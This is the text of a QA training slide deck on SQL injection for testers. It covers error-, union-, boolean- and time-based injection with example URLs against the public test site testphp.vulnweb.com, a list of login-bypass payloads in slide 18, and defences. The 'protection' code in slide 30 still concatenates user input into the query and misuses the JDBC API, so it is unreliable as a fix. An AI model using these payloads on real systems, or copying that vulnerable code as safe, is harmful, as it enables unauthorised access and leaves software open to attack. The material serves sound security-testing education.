This document discusses SQL injections and how every tester needs to know about them. It covers the different types of SQL injections like error-based, union-based, boolean-based and time-based injections. Examples are provided for each type. The document also discusses ways to protect against SQL injections like parameterized statements, input validation, and access control. It emphasizes the importance of security testing and being aware of injection vulnerabilities.

1. SQL Injections
Every Tester Needs To Know
BY VLADIMIR ARUTIN

2. ABOUT MYSELF
VLADIMIR ARUTIN
SENIOR QA at AB SOFT
ISTQB Certified Test Manager
ISTQB and QA Manual Training Instructor
Certified Coach, Public Speaker

3. OWASP TOP 10
1. INJECTION
2. BROKEN AUTHENTICATION
3. SENSITIVE DATA EXPOSURE
4. XML EXTERNAL ENTITIES (XXE)
5. BROKEN ACCESS CONTROL
6. SECURITY MISCONFIGURATION
7. CROSS-SITE SCRIPTING
8. INSECURE DESERIALIZATION
9. USING COMPONENTS WITH KNOWN VULNERABILITIES
10. INSUFFICIENT LOGGING AND MONITORING

4. TYPES OF INJECTIONS
SQL
HTML
XML
Shell-command
Code
Log file
LDAP
SSI
XPath XAML

5. WHAT’S THE POINT

6. EXAMPLES
<h1>hacked</h1>

7. EXAMPLES
Web application template for search results page:
User query text:
Generated results: or such results:

8. EXAMPLES
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>arutin.vladimir@gmail.com</email>
</user>
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>arutin.vladimir@gmail.com</email>
</user>
……..
……..
<use>
<uname>Bill</uname>
<pwd>msk*Q^08f5WspV</pwd>
<role>administrator</role>
<email>bill.gates@microsoft.com</email>
</user>

9. EXAMPLES
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>hack</email>
<role>administrator</role>
<email>arutin.vladimir@gmail.com</email>
</user>

10. Top Programming Languages 2020

11. Top Programming Languages 2020

12. vulnerable programming languages
2010-2019

13. WHEN YOU REMINDED THAT you wrote the
world’s biggest social network in PHP

14. TOTAL REPORTED OPEN SOURCE
VULNERABILITIES PER LANGUAGE

15. SQL INJECTIONS
HOW DOES IT HAPPEN?
a web application does not validate values received from a web
form, cookie, input parameter, etc., before passing them
to SQL queries.
Your code uses unsanitized data from user input in SQL statements
A malicious user includes SQL elements in the input in a tricky way
Your code executes these SQL elements as part of legitimate SQL
statements

16. EXAMPLES
SELECT * FROM users WHERE username = ‘admin’- -’
AND password = ‘password’
SELECT * FROM users WHERE username ="" or ""=""
AND password ="" or ""=""
SELECT * FROM clients WHERE clientID = 105 OR 1=1

17. SQL INJECTIONS EXAMPLES
qalab@gmail.com
xxx’) OR 1=1--]
SELECT * FROM users WHERE email=‘qalab@gmail.com’ AND password=md5(‘xxx’) OR 1=1--]’);

18. SQL INJECTIONS vocabulary
' or 1=1
' or 1=1–
' or 1=1#
' or 1=1/*
admin' –
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'–
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1–
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'–
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'–
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin',
'81dc9bdb52d04dc20036dbd8313ed055
admin" –
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"–
admin" or "1"="1"#
admin" or "1"="1"/*
admin“ or 1=1 or ""=“
admin" or 1=1

19. SQL Injection Types
Error-based SQL injection
• The attacker creates the SQL injection to make the back-end display an error
• The back-end returns an error to the attacker
• The attacker uses information contained in the error to escalate the attack
• is used to access sensitive information (database type, file names, and more)

20. SQL Injection Types
Error-based SQL injection
Example: http://testphp.vulnweb.com/listproducts.php?cat=1′
Result: The web application displays the following error in the browser:
Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near ”’ at
line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /hj/var/www/listproducts.php on line 74

21. SQL Injection Types
Union-based SQL injection
• The attacker uses a UNION clause in the payload
• The SQL engine combines sensitive information with legitimate
• information that the web application should display
• The web application displays sensitive information

22. SQL Injection Types
Example: http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT
1,version(),current_user()
Result: The web application displays the system version and the name of the
current user:
5.1.73-0ubuntu0.10.04.1
acuart@localhost
Union-based SQL injection

23. SQL Injection Types
Boolean-based SQL injection
• The attacker sends many payloads that make the application
return a different resultS depending on TRUE or FALSE
• The attacker draws a conclusion from web application behavior
for each payload
• is often used to check whether any other SQL injections are
possible but it can also be used to access sensitive information

24. SQL Injection Types
Example:
http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1
Payload 2:
http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0
Result: In both cases, the application behaves differently. The attacker now
knows that the application is vulnerable to SQL injections.
Boolean-based SQL injection

25. SQL Injection Types
Time-based SQL injection
the attacker sends a payload that includes a time delay command such
as SLEEP, which delays the whole response
The attacker repeats the process as many times as possible with
different arguments
is used to guess the content of a database cell a character at a time by
using different ASCII values in conjunction with a time delay

26. SQL Injection Types
Example:
http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)
Result: The page loads with a delay. is vulnerable to SQL injections.
Time-based SQL injection

27. DEMO TIME

28. WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only

29. How can you protect yourself?
Parameterized Statements
Stored procedures
Web application firewall
Whitelist Input Validation
Escaping All User Supplied Input
USE LIMIT IN SQL QUeRIES
Trust no one
Update and patch
Use appropriate privileges
Continuously monitor SQL statements from dB-connected apps
Buy better software

30. EXAMPLE OF PROTECTION
// Define which user we want to find.
String email = "user@email.com";
// Connect to the database.
Connection conn = DriverManager.getConnection(URL, USER, PASS);
Statement stmt = conn.createStatement();
// Construct the SQL statement we want to run, specifying the parameter.
String sql = "SELECT * FROM users WHERE email = '" + email + "'";
// Run the query, passing the 'email' parameter value...
ResultSet results = stmt.executeQuery(sql, email);
while (results.next()) {
// ...do something with the data returned.
}
String sql = "SELECT * FROM users WHERE email = ?";

31. CONCLUSION

32. BONUS
Danger IS everywhere

33. DEMO TIME

34. WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only

35. THANKS FOR WATCHING
AND
God bless your Data base